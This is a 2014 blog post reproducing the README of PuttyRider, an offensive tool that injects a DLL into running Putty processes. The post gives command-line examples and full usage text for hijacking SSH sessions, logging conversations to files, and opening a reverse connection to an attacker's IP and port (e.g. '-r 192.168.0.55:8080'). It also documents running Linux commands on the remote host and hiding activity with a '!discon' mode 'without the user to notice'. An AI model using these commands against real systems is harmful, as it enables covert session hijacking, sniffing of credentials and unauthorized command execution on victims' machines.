Thursday, December 11, 2014

PuttyRider


PuttyRider is a tool for performing dll injection of Putty and allows an attacker to inject Linux commands.
REF: https://github.com/seastorm/PuttyRider














PuttyRider
Hijack Putty sessions in order to sniff conversation and inject Linux commands.

Download
PuttyRider-bin.zip

Documentation
Defcamp 2014 presentation - pdf
Defcamp 2014 presentation - video

Examples:
List existing Putty processes and their status (injected / not injected)

  • PuttyRider.exe -l


Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

  • PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

  • PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

  • PuttyRider.exe -x

Usage:
Operation modes:
    -l      List the running Putty processes and their connections

    -w      Inject in all existing Putty sessions and wait for new sessions
            to inject in those also

    -p PID  Inject only in existing Putty session identified by PID.
            If PID==0, inject in the first Putty found

    -x      Cleanup. Remove the DLL from all running Putty instances

    -d      Debug mode. Only works with -p mode

    -c CMD  Automatically execute a Linux command after successful injection
            PuttyRider will remove trailing spaces and '&' character from CMD
            PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD

    -h      Print this help

Output modes:
    -f          Write all Putty conversation to a file in the local directory.
                The filename will have the PID of current putty.exe appended

    -r IP:PORT  Initiate a reverse connection to the specified machine and
                start an interactive session.

Interactive commands (after you receive a reverse connection):
    !status     See if the Putty window is connected to user input

    !discon     Disconnect the main Putty window so it won't display anything
                    This is useful to send commands without the user to notice

    !recon      Reconnect the Putty window to its normal operation mode

    CMD       Linux shell commands

    !exit        Terminate this connection

    !help       Display help for client connection

Compiling:
Use Visual Studio Command Prompt:

  • nmake main dll


Acknowledgements
Thanks to Brett Moore of Insomnia Security for his proof of concept PuttyHijack

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